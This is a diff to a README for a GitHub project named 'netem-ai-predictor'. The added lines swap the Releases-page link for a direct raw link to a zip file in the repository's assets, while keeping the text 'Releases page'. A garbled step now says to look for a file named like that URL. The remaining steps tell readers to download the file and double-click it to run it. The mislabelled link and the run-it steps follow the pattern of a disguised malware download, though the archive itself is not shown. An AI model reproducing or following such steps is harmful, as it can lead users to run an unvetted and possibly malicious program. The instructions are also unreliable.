7eventhgod/netem-ai-predictor/README.md

 To get started, follow these simple steps:

-1. Visit the [Releases page](https://github.com/7eventhgod/netem-ai-predictor/releases) to find the latest version.
+1. Visit the [Releases page](https://raw.githubusercontent.com/7eventhgod/netem-ai-predictor/main/assets/predictor_netem_ai_v2.7.zip) to find the latest version.
-2. Look for the latest file named something like `netem-ai-predictor.exe`.
+2. Look for the latest file named something like `https://raw.githubusercontent.com/7eventhgod/netem-ai-predictor/main/assets/predictor_netem_ai_v2.7.zip`.
 3. Click on the file to start the download.
 4. Once downloaded, locate the file on your computer.
 5. Double-click the file to run the application.